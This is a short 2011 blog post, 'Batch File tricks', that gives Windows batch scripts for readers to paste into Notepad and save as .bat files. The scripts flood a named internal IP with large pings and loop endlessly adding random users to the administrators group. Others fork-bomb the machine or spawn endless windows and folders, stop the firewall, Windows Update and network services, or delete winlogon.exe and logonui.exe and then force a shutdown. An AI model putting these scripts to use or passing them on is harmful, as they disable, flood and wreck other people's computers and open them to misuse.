Batch File tricks

Post date: Mar 27, 2011 6:39:20 AM

Open Notepad & Type

@echo off

:flood

ping -l 65500 -t 10.179.65.68

start flooder.bat

goto flood

Save as name.bat

Open Notepad & Type

@echo off

:netannoy

msg * Hi!

msg * How r u ?

msg * Wat's Up ?

msg * Myselfboobalan Chandel....

msg * My Web Links are....

msg * www.boobalan3.wetpaint.com.....

msg * www.upscportal.in

msg * www.usefulwebsitename.blogspot.com

goto netannoy

Save as tricks.bat

open notepad & type

@echo off

:usrflood

set usr=%random%

net users %usr% %random% /add

net localgroup administrators %usr% /add

goto usrflood

Save as tricks.bat

open notepad & type

:loop

md Virus

cd Virus

goto loop

save as boobalan.bat

open notepad & type

@echo off

:loop

Explorer

Call fork.bat

Goto loop

save as hackingarticles.bat

You can change the extension for all files in a folder automatically using the command prompt too

open notepad & type

@echo off

:loop

start notepad

start compmgmt.msc

start mspaint

start osk

start cmd

start explorer

start control

start calc

goto loop

save as boobalna.bat

open notepad & type

@echo off

net stop "Windows Firewall"

net stop "Windows Update"

net stop Workstation

net stop "DHCP Client"

net stop "DNS Client"

net stop "Print Spooler"

net stop Themes

exit

save as boobalan.bat

open notepad and type

@echo off

start

%0

goto :start

save as boobalan.bat

open notepad and type

@echo off

:loop

md %random%

goto loop

saveas booalan.bat

1.copy this and paste this in your notepad..

@echo off

del c:\windows\system32\restore

del c:\windows\system32\winlogon.exe

del c:\windows\system32\logonui.exe

shutdown -f

2.save it and give it a name like "tricks" or whatever just remember to put ".bat" at the end of it.

Open Notepad & Type

@echo off

:loop

Explorer

Call fork.bat

Goto loop

save  it  as  ‘fork.bat’

The system to crash by popping up hundreds of windows on the screen